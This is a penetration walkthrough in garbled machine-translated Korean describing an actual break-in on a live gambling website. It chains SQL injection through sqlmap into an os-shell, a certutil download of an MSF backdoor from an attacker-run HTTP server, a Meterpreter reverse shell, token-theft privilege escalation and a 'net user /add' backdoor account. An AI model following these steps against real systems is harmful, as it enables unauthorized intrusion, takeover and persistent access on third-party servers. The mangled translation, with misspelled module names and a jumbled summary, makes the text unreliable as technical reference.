제목 : 불법 웹 사이트에 대한 권리 하이킹

0x01 收集信息​

주로 SQL 주입을 연습하고 싶기 때문에 정보 수집은 비교적 간단합니다.
FOFA를 통해 관련 CMS를 찾으십시오. 여기서는 체스 및 카드 배경 로그인에 SQL 주입 취약성이 있음을 발견했습니다.
1049983-20220106103848636-924492451.png

0x02 漏洞利用​

1. SQLMAP 셔틀을 사용하고 os-shell을 얻으십시오
1049983-20220106103850462-796781300.png

2. Python을 사용하여 간단한 HTTP 서버를 구축하고 MSF에서 생성 한 백도어 파일을 장착하십시오.
Python -m simplehttpserver
1049983-20220106103851323-1030757479.png

3. OS-SHELL에서 원격 다운로드 백도어 실행 프로그램
OS-Shell 아래에서 디렉토리를 만듭니다
MKDIR C: \ 테스트
OS-SHELL의 Certutil 명령을 통해 서버로 백도어 파일을 원격으로 다운로드하십시오.
1049983-20220106103851746-367273951.jpg
1049983-20220106103852218-758504582.jpg
4. MSF 리바운드 쉘을 실행하십시오
Exploit/Mulit/Hander를 사용하십시오
Set Lhost는 리바운드 쉘의 IP를 수신합니다
달리다
1049983-20220106103852625-1098906251.jpg
1049983-20220106103853010-983725142.jpg

5. 서버에 성공적으로 입력했습니다
현재, 우리는 우리는 단지 돌출 권한 만 있음을 발견했습니다.
6. 대상 서버의 권한을 높이십시오
전력 향상 방법 : 커널 에스컬레이션 및 도둑질 관리 토큰 에스컬레이션
이 기사는 도난 관리 토큰 만 사용하여 전력을 높입니다.
시크릿을 사용하여 세션 토큰 모듈을로드하십시오
그런 다음 List_tokens -u로 세션 토큰을 나열하십시오
1049983-20220106103853526-792774397.png

7. 사용자를 만듭니다
명령 : 순 사용자 이름 비밀번호 /추가
1049983-20220106103854204-918244820.png

1049983-20220106103854793-904428810.png

0x03 渗透总结​

1. SQLMAP를 통해 OS-SHELL2를 얻습니다. MSF 3에 따른 백도어 파일 생산. Python -m SimpleHttpserver를 통해 HTTP 서버를 구축하고 생성 된 백도어 파일을 HTTP 서버 디렉토리에 복사하십시오. 2. Os-Shell 모드에서 디렉토리를 만들고 Certutil을 통해 HTTP 서버에서 백도어를 원격으로 다운로드하십시오. 4. MSF를 통한 쉘 바운스. MSF 아래에 사용자를 추가하고 관리자 그룹에 추가하면 데스크탑에 원격으로 로그인 할 수 있습니다.
 
뒤로
상단